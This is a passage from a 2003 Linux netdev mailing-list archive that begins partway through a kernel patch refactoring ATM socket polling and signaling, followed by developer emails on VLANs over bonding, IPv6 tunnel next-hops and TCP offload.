poll_table *wait) { + struct sock *sk = sock->sk; struct atm_vcc *vcc; unsigned int mask; - vcc = ATM_SD(sock); - poll_wait(file, vcc->sk->sk_sleep, wait); + poll_wait(file, sk->sk_sleep, wait); mask = 0; - if (skb_peek(&vcc->sk->sk_receive_queue)) - mask |= POLLIN | POLLRDNORM; - if (test_bit(ATM_VF_RELEASED,&vcc->flags) || - test_bit(ATM_VF_CLOSE,&vcc->flags)) + + vcc = ATM_SD(sock); + + /* exceptional events */ + if (sk->sk_err) + mask = POLLERR; + + if (test_bit(ATM_VF_RELEASED, &vcc->flags) || + test_bit(ATM_VF_CLOSE, &vcc->flags)) mask |= POLLHUP; - if (sock->state != SS_CONNECTING) { - if (vcc->qos.txtp.traffic_class != ATM_NONE && - vcc->qos.txtp.max_sdu + - atomic_read(&vcc->sk->sk_wmem_alloc) <= vcc->sk->sk_sndbuf) - mask |= POLLOUT | POLLWRNORM; - } - else if (vcc->reply != WAITING) { - mask |= POLLOUT | POLLWRNORM; - if (vcc->reply) mask |= POLLERR; - } + + /* readable? */ + if (!skb_queue_empty(&sk->sk_receive_queue)) + mask |= POLLIN | POLLRDNORM; + + /* writable? */ + if (sock->state == SS_CONNECTING && + test_bit(ATM_VF_WAITING, &vcc->flags)) + return mask; + + if (vcc->qos.txtp.traffic_class != ATM_NONE && + vcc_writable(vcc->sk)) + mask |= POLLOUT | POLLWRNORM | POLLWRBAND; + return mask; } diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jul 14 22:19:44 2003 +++ b/net/atm/common.h Mon Jul 14 22:19:44 2003 @@ -17,7 +17,7 @@ int size, int flags); int vcc_sendmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *m, int total_len); -unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait); +unsigned int vcc_poll(struct file *file, struct socket *sock, poll_table *wait); int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg); int vcc_setsockopt(struct socket *sock, int level, int optname, char *optval, int optlen); diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/proc.c Mon Jul 14 22:19:44 2003 @@ -224,7 +224,7 @@ here += sprintf(here, "%3d", vcc->sk->sk_family); } here += sprintf(here," %04lx %5d %7d/%7d %7d/%7d\n",vcc->flags, - vcc->reply, + vcc->sk->sk_err, atomic_read(&vcc->sk->sk_wmem_alloc), vcc->sk->sk_sndbuf, atomic_read(&vcc->sk->sk_rmem_alloc), vcc->sk->sk_rcvbuf); } diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/pvc.c Mon Jul 14 22:19:44 2003 @@ -111,7 +111,7 @@ .socketpair = sock_no_socketpair, .accept = sock_no_accept, .getname = pvc_getname, - .poll = atm_poll, + .poll = vcc_poll, .ioctl = vcc_ioctl, .listen = sock_no_listen, .shutdown = pvc_shutdown, diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/raw.c Mon Jul 14 22:19:44 2003 @@ -40,7 +40,7 @@ skb->truesize); atomic_sub(skb->truesize, &vcc->sk->sk_wmem_alloc); dev_kfree_skb_any(skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_write_space(vcc->sk); } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/signaling.c Mon Jul 14 22:19:44 2003 @@ -105,7 +105,8 @@ vcc = *(struct atm_vcc **) &msg->vcc; switch (msg->type) { case as_okay: - vcc->reply = msg->reply; + vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); if (!*vcc->local.sas_addr.prv && !*vcc->local.sas_addr.pub) { vcc->local.sas_family = AF_ATMSVC; @@ -125,8 +126,8 @@ case as_error: clear_bit(ATM_VF_REGIS,&vcc->flags); clear_bit(ATM_VF_READY,&vcc->flags); - vcc->reply = msg->reply; vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); break; case as_indicate: vcc = *(struct atm_vcc **) &msg->listen_vcc; @@ -147,8 +148,8 @@ case as_close: set_bit(ATM_VF_RELEASED,&vcc->flags); clear_bit(ATM_VF_READY,&vcc->flags); - vcc->reply = msg->reply; vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); break; case as_modify: modify_qos(vcc,msg); @@ -204,8 +205,8 @@ if (vcc->sk->sk_family == PF_ATMSVC && !test_bit(ATM_VF_META,&vcc->flags)) { set_bit(ATM_VF_RELEASED,&vcc->flags); - vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; + clear_bit(ATM_VF_WAITING, &vcc->flags); vcc->sk->sk_state_change(vcc->sk); } } diff -Nru a/net/atm/signaling.h b/net/atm/signaling.h --- a/net/atm/signaling.h Mon Jul 14 22:19:44 2003 +++ b/net/atm/signaling.h Mon Jul 14 22:19:44 2003 @@ -11,9 +11,6 @@ #include -#define WAITING 1 /* for reply: 0: no error, < 0: error, ... */ - - extern struct atm_vcc *sigd; /* needed in svc_release */ diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/svc.c Mon Jul 14 22:19:44 2003 @@ -137,10 +137,10 @@ goto out; } vcc->local = *addr; - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_bind,NULL,NULL,&vcc->local); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } @@ -150,9 +150,9 @@ error = -EUNATCH; goto out; } - if (!vcc->reply) + if (!sk->sk_err) set_bit(ATM_VF_BOUND,&vcc->flags); - error = vcc->reply; + error = -sk->sk_err; out: release_sock(sk); return error; @@ -183,13 +183,13 @@ error = -EISCONN; goto out; case SS_CONNECTING: - if (vcc->reply == WAITING) { + if (test_bit(ATM_VF_WAITING, &vcc->flags)) { error = -EALREADY; goto out; } sock->state = SS_UNCONNECTED; - if (vcc->reply) { - error = vcc->reply; + if (sk->sk_err) { + error = -sk->sk_err; goto out; } break; @@ -218,7 +218,7 @@ goto out; } vcc->remote = *addr; - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); sigd_enq(vcc,as_connect,NULL,NULL,&vcc->remote); if (flags & O_NONBLOCK) { @@ -228,7 +228,7 @@ goto out; } error = 0; - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); if (!signal_pending(current)) { prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); @@ -248,11 +248,11 @@ * Kernel <--close--- Demon */ sigd_enq(vcc,as_close,NULL,NULL,NULL); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } - if (!vcc->reply) + if (!sk->sk_err) while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); @@ -272,8 +272,8 @@ error = -EUNATCH; goto out; } - if (vcc->reply) { - error = vcc->reply; + if (sk->sk_err) { + error = -sk->sk_err; goto out; } } @@ -311,10 +311,10 @@ error = -EINVAL; goto out; } - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_listen,NULL,NULL,&vcc->local); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } @@ -326,7 +326,7 @@ set_bit(ATM_VF_LISTEN,&vcc->flags); vcc->sk->sk_max_ack_backlog = backlog > 0 ? backlog : ATM_BACKLOG_DEFAULT; - error = vcc->reply; + error = -sk->sk_err; out: release_sock(sk); return error; @@ -359,7 +359,7 @@ sigd) { if (test_bit(ATM_VF_RELEASED,&old_vcc->flags)) break; if (test_bit(ATM_VF_CLOSE,&old_vcc->flags)) { - error = old_vcc->reply; + error = -sk->sk_err; break; } if (flags & O_NONBLOCK) { @@ -399,10 +399,10 @@ goto out; } /* wait should be short, so we ignore the non-blocking flag */ - new_vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &new_vcc->flags); prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(new_vcc,as_accept,old_vcc,NULL,NULL); - while (new_vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &new_vcc->flags) && sigd) { release_sock(sk); schedule(); lock_sock(sk); @@ -413,9 +413,10 @@ error = -EUNATCH; goto out; } - if (!new_vcc->reply) break; - if (new_vcc->reply != -ERESTARTSYS) { - error = new_vcc->reply; + if (!new_vcc->sk->sk_err) + break; + if (new_vcc->sk->sk_err != ERESTARTSYS) { + error = -new_vcc->sk->sk_err; goto out; } } @@ -443,17 +444,17 @@ { DEFINE_WAIT(wait); - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq2(vcc,as_modify,NULL,NULL,&vcc->local,qos,0); - while (vcc->reply == WAITING && !test_bit(ATM_VF_RELEASED,&vcc->flags) - && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && + !test_bit(ATM_VF_RELEASED, &vcc->flags) && sigd) { schedule(); prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } finish_wait(vcc->sk->sk_sleep, &wait); if (!sigd) return -EUNATCH; - return vcc->reply; + return -vcc->sk->sk_err; } @@ -519,7 +520,7 @@ .socketpair = sock_no_socketpair, .accept = svc_accept, .getname = svc_getname, - .poll = atm_poll, + .poll = vcc_poll, .ioctl = vcc_ioctl, .listen = svc_listen, .shutdown = svc_shutdown, From kuznet@ms2.inr.ac.ru Tue Jul 15 06:20:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 06:21:01 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FDKmFl013094 for ; Tue, 15 Jul 2003 06:20:51 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id RAA08283; Tue, 15 Jul 2003 17:20:30 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151320.RAA08283@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Tue, 15 Jul 2003 17:20:30 +0400 (MSD) Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org In-Reply-To: <20030715.155930.65250697.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at éÀÌ 15, 2003 03:59:30 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4048 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > > > + IFA_IFFLAGS, > > > > What's about ifa_flags? There is some space there, and the things > > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > > of O/M. > > Alexey, O/M are not flags for addresses, but for interfaces. > I believe we should not mix them up. OK. But tell me, please, what is the difference between new _address_ attribute IFA_IFFLAGS and already existing address attrbute ifa_flags? If you are going to enclose these per-interface flags to address information, they can be enclosed within existing attrubute. Alexey From shmulik.hen@intel.com Tue Jul 15 06:55:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 06:55:56 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FDtZFl016482 for ; Tue, 15 Jul 2003 06:55:37 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6FDs8405855 for ; Tue, 15 Jul 2003 13:54:10 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6FDs1r26913 for ; Tue, 15 Jul 2003 13:54:01 GMT Received: from jrslxjul1.npdj.intel.com ([10.12.254.186]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071506595925293 ; Tue, 15 Jul 2003 07:00:02 -0700 Date: Tue, 15 Jul 2003 16:55:18 +0300 (IDT) From: Shmulik Hen X-X-Sender: Reply-To: Shmulik Hen To: bond-devel , linux-net , linux-netdev , "David S. Miller" , Ben Greear , Jeff Garzik , Jay Vosburgh cc: Amir Noam , Noam Marom , Shmulik Hen , Tsippy Mendelson Subject: [RFC][bonding] Improve VLAN support on top of bonding Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4049 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Hi All, Currently, when using 8021q VLAN module to work on top of bonding, everything seems to work OK, but there are some issues that will not work according to our analysis. For example, any self-generated packets sent by bonding itself (e.g. arp-mon, TLB learning packets, ALB arp replies, etc.) do not have the VLAN id tag in them, and thus will not go through the switch. Also, in order to configure a VLAN interface, the underlying interface must be configured first to IP address 0.0.0.0. Since arp-mon uses bond's IP address, this might cause further problems. Other issue we've still not investigated, like what happens if bonding needs to parse a tagged packet for layer2/layer3 data, might still create more problems. We have come up with some possible solution we would like to get comments on. First of all, our main guide line was not to duplicate code segments that are in the VLAN module and put them in bonding. Further, we figured bonding should not need to know about how the VLAN module handles hardware acceleration. On the other hand, bonding does need to know what VLAN tags are being used so it may send packets successfully through all the switch ports, so some kind of policy needs to be defined. So here is what we've come up with until now. 1. Configuration Need to decide between: a. Block VLAN add/del operations when bond has no slaves. b. Block enslave/release of slaves when bond has no VLAN tags (needs a module parameter). c. Remove limitation of IP 0.0.0.0. 2. Indication Need to decide between: a. Add notification mechanism in VLAN module that bonding may register to listen to, and thus keep track of VLAN tags added/removed. b. Register to listen to net device register/unregister notifications to monitor creation/destruction of VLAN devices. Requires support for figuring out if a net device is a VLAN device, and also two vlan calls like get_realdev() and get_vlan_id() exported. c. Parse every packet going through bonding to collect VLAN tags. 3. Monitoring In order for bonding to be able to generate tagged packets on its own, two major changes need to be done. One is split the vlan_start_xmit function into insert_tag() and vlan_xmit(), so bonding may choose the required tag on its own, and let 8021q to the transmit. A second change is to split arp_send() into arp_create() and arp_send(), so bonding may pass all the usual parameters for arp creation, get a complete arp packet and then pass it to 8021q for tag insertion on transmission. Hardware acceleration ===================== When coming to analyze what is required for adding support for VLAN hardware acceleration on top of bonding, other issues come to mind. Since add/del operations are defined and handshakes are performed between the VLAN module and the device driver, tracking VLAN tags is simpler and commands should just be propagated to the slaves. Enslaving/releasing slaves should also be simple and just require adding/removing existing VLAN tags from them. The problem is how to handle configuration issues. 1. Since adding the first VLAN tag requires some additional handshake, can bonding support that operation on a bond that already has slaves and is running? 2. What about removing the last tag from a bond? 3. Should the bond device declare itself as "VLAN challenged" before registering and remove that limitation only once it has slaves? 4. Should the bond declare itself as fully hardware acceleration capable to benefit from "strong" slaves while performing regular VLAN inserting/stripping for "weak" slaves? 5. How can bonding generate untagged packets and send them via hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | From kuznet@ms2.inr.ac.ru Tue Jul 15 07:29:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 07:29:14 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FET6Fl017830 for ; Tue, 15 Jul 2003 07:29:07 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA08491; Tue, 15 Jul 2003 18:28:49 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151428.SAA08491@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Tue, 15 Jul 2003 18:28:49 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 09:28:11 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4050 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll > parse global next-hop information and resolve it for the kernel, and > report the resolved information to the kernel (see the other thread) No, really. It is problem of user to supply reasonable values. This policy is not forced, because there are many cases when it does not make sense (f.e. on all the routers, on all the PtP interfaces et al). Verification of validity of nexthop is to be done only when receiving nexthop through addrconf or redirect et al. I guess interiour protocols also should take care of it. > 2) the kernel supports "must-resolve" next-hops. I do not know what it is. > practical situation is rather simple: for the case of a:b in 6to4, they're > always irrelevant. Sure. It is becasue use of 6to4 address is meaningless in this context. It is thought which I try to deliver. > Note that nothing _prevents_ you from treating a:b in 2002:x:y::a:b I do not understand the rest. Listen, tunnel needs an _IPv4_ address for destiantion of tunnel. Because our routing does not permit to use different address family as nexthop, we did trick presenting it as an IPv4-compat address. We could do this differently, f.e. to use FFFF:EEEE:IPv4-addr:CCCC:DDDD with the same success or any other randomly chosen encapsulation. And this silly combination is still _better_ than 6to4 address, which contains redundant information, which can be mixed up with real _IPv6_ 6to4 addresses and whihc contains IPv4 address in some place which used to be identification of a network prefix. Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 07:47:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 07:47:19 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FEl9Fl018950 for ; Tue, 15 Jul 2003 07:47:10 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA08540; Tue, 15 Jul 2003 18:46:57 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151446.SAA08540@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Tue, 15 Jul 2003 18:46:57 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 09:14:07 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4051 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > "resolve" next-hops. I.e., the requirement that the users/protocols will > give you non-final nexthop information which you have to "resolve" to get > the final nexthop (e.g. a global address -> a link-local address > obtained using Neighbor Discovery). No way to resolve exists, unless it already embedded to corresponding protocol. F.e. global address and its link-local equivalent could be transferred as attributes of BGP4+, global address is used to validate nexthop attribute and as soon as it happens to be on-link, its link-local counterpart is used. If you have a global address out of context and want to use it as nexthop, you are in troubles. You have no way to get a unique router identifier, it is just not defined. So, you have to use global one (and kernel has to allow this), and surely will screw up the network, unless some policy constraints make the configuration legal. Well, actually, we inevitably arrive to conclusion that all the idea about scoped addresses is just a garbage, which results in nothing but inconveniences and innumerous inconsistencies. I remember some people predicted that it will be dropped to start of real Ipv6 deployment. Well, it is still not night. Alexey From dagriego@hotmail.com Tue Jul 15 09:28:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 09:28:23 -0700 (PDT) Received: from hotmail.com (sea2-f43.sea2.hotmail.com [207.68.165.43]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FGSFFl028832 for ; Tue, 15 Jul 2003 09:28:16 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 15 Jul 2003 09:28:10 -0700 Received: from 143.182.124.2 by sea2fd.sea2.hotmail.msn.com with HTTP; Tue, 15 Jul 2003 16:28:10 GMT X-Originating-IP: [143.182.124.2] X-Originating-Email: [dagriego@hotmail.com] From: "David griego" To: davem@redhat.com, jros@xiran.com Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com Subject: Re: TCP IP Offloading Interface Date: Tue, 15 Jul 2003 09:28:10 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 15 Jul 2003 16:28:10.0676 (UTC) FILETIME=[14B7AF40:01C34AEE] X-archive-position: 4052 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dagriego@hotmail.com Precedence: bulk X-list: netdev Ok I've taken a look at your scheme and I have a few questions. >From: "David S. Miller" >You also ignore the points others have made that the systems HAVE >SCALED to evolving networks technologies as they have become faster >and faster. > This is not true in the embedded space. As I keep pointing out typical embedded processors don't have as many free cycles as server computers. > > >My RX receive page accumulation scheme handles all of the >receive side problems with touching the data and getting >into the filesystem and then the device. With my scheme >you can receive the data, go direct to the device, and the >cpu never touches one byte. > RDDP tries to get around needing a large amount of RAM on the NIC to collect all of this data before writing it to the OS memory. Also, this store and forward architecture you recommend adds latency in collecting all of this data before moving it to the OS. Finally, I recall some resistance to page flipping which could also lead to walking page tables. More latency. After some extremely large amount of time your receive data has made it to your application. Do you have a suggestion on how we could get around all of this store and forward without RDDP? Just avoiding the CPU copy is not the only issue. > >I actually welcome Microsoft falling into this rathole of a >technology. Let them have to support that crap and have to field bug >reports on it, having to wonder who created the packets. And let them >deal with the negative effects TOE has on connection rates and things >like that. > Would it be shame if they found away around this "problem" you see and are successful and Linux failed because you felt the community is not able overcome these though obstacles? > >Linux will be competitive, especially if people develop the scheme I >have described several times into the hardware. There are vendors >doing this, will you choose to be different and ignore this? Your ideas are good, but they leave in this store and forward issue that I mentioned. A good alternative would be one that kept things simple as you suggested, but didn't introduce all of this latency. _________________________________________________________________ The new MSN 8: smart spam protection and 2 months FREE* http://join.msn.com/?page=features/junkmail From greearb@candelatech.com Tue Jul 15 10:25:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:25:23 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHP7Fl030778 for ; Tue, 15 Jul 2003 10:25:08 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6FHOnKk016609; Tue, 15 Jul 2003 10:24:49 -0700 Message-ID: <3F1438E1.5000600@candelatech.com> Date: Tue, 15 Jul 2003 10:24:49 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Shmulik Hen CC: bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4053 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Shmulik Hen wrote: > Hi All, > > Currently, when using 8021q VLAN module to work on top of bonding, > everything seems to work OK, but there are some issues that will not work > according to our analysis. For example, any self-generated packets sent by > bonding itself (e.g. arp-mon, TLB learning packets, ALB arp replies, etc.) > do not have the VLAN id tag in them, and thus will not go through the > switch. Also, in order to configure a VLAN interface, the underlying > interface must be configured first to IP address 0.0.0.0. Since arp-mon > uses bond's IP address, this might cause further problems. Other issue > we've still not investigated, like what happens if bonding needs to parse > a tagged packet for layer2/layer3 data, might still create more problems. > > We have come up with some possible solution we would like to get > comments on. First of all, our main guide line was not to duplicate code > segments that are in the VLAN module and put them in bonding. Further, we > figured bonding should not need to know about how the VLAN module handles > hardware acceleration. On the other hand, bonding does need to know what > VLAN tags are being used so it may send packets successfully through all > the switch ports, so some kind of policy needs to be defined. > > So here is what we've come up with until now. > > 1. Configuration > Need to decide between: > a. Block VLAN add/del operations when bond has no slaves. > b. Block enslave/release of slaves when bond has no VLAN tags (needs a > module parameter). > c. Remove limitation of IP 0.0.0.0. > > 2. Indication > Need to decide between: > a. Add notification mechanism in VLAN module that bonding may register > to listen to, and thus keep track of VLAN tags added/removed. > b. Register to listen to net device register/unregister notifications > to monitor creation/destruction of VLAN devices. Requires support > for figuring out if a net device is a VLAN device, and also two vlan > calls like get_realdev() and get_vlan_id() exported. b) sounds good to me. There are flags that can let you know if it's a vlan device or not. if.h:#define IFF_802_1Q_VLAN 0x1 /* 802.1Q VLAN device. */ > c. Parse every packet going through bonding to collect VLAN tags. > > 3. Monitoring > In order for bonding to be able to generate tagged packets on its own, > two major changes need to be done. One is split the vlan_start_xmit > function into insert_tag() and vlan_xmit(), so bonding may choose the > required tag on its own, and let 8021q to the transmit. A second change > is to split arp_send() into arp_create() and arp_send(), so bonding may > pass all the usual parameters for arp creation, get a complete arp > packet and then pass it to 8021q for tag insertion on transmission. > > > Hardware acceleration > ===================== > When coming to analyze what is required for adding support for > VLAN hardware acceleration on top of bonding, other issues come to mind. > Since add/del operations are defined and handshakes are performed between > the VLAN module and the device driver, tracking VLAN tags is simpler and > commands should just be propagated to the slaves. Enslaving/releasing > slaves should also be simple and just require adding/removing existing > VLAN tags from them. The problem is how to handle configuration issues. I'd consider ignoring the HW accel unless you can prove it actually helps performance to a noticeable degree. I have never seen results of any benchmarking related to this... > > 1. Since adding the first VLAN tag requires some additional handshake, > can bonding support that operation on a bond that already has slaves > and is running? > 2. What about removing the last tag from a bond? > 3. Should the bond device declare itself as "VLAN challenged" before > registering and remove that limitation only once it has slaves? > 4. Should the bond declare itself as fully hardware acceleration capable > to benefit from "strong" slaves while performing regular VLAN > inserting/stripping for "weak" slaves? > 5. How can bonding generate untagged packets and send them via > hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From pekkas@netcore.fi Tue Jul 15 10:29:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:29:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHTPFl031170 for ; Tue, 15 Jul 2003 10:29:26 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6FHTBn14099; Tue, 15 Jul 2003 20:29:11 +0300 Date: Tue, 15 Jul 2003 20:29:11 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307151446.SAA08540@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4054 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > "resolve" next-hops. I.e., the requirement that the users/protocols will > > give you non-final nexthop information which you have to "resolve" to get > > the final nexthop (e.g. a global address -> a link-local address > > obtained using Neighbor Discovery). > > No way to resolve exists, unless it already embedded to corresponding > protocol. Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router is the one with interface ID one. What happens when you do "ping6 3FFE:FFFF:A:B::1" 